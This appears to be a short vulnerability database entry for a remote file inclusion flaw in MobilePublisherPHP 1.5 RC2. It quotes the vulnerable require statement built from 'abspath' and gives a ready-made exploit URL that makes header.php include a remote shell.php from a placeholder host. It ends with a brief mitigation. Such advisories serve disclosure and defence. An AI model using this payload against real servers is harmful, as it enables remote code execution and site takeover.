vendor:
MobilePublisherPHP
by:
Timq
7,5
CVSS
HIGH
Remote Include Vulnerability
98
CWE
Product Name: MobilePublisherPHP
Affected Version From: 1.5 RC2
Affected Version To: 1.5 RC2
Patch Exists: YES
Related CWE: N/A
CPE: a:mobilepublisherphp:mobilepublisherphp:1.5rc2
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
MobilePublisherPHP 1.5 RC2 (functions.php)Remote Include Vulnerability
Discovered by Timq, a vulnerable code require $abspath."/functions.php"; can be exploited by sending a malicious URL http://site.com/[dir]/header.php?abspath=http://site.com/shell.php? to the target server.
Mitigation:
Input validation and sanitization should be done to prevent malicious code execution.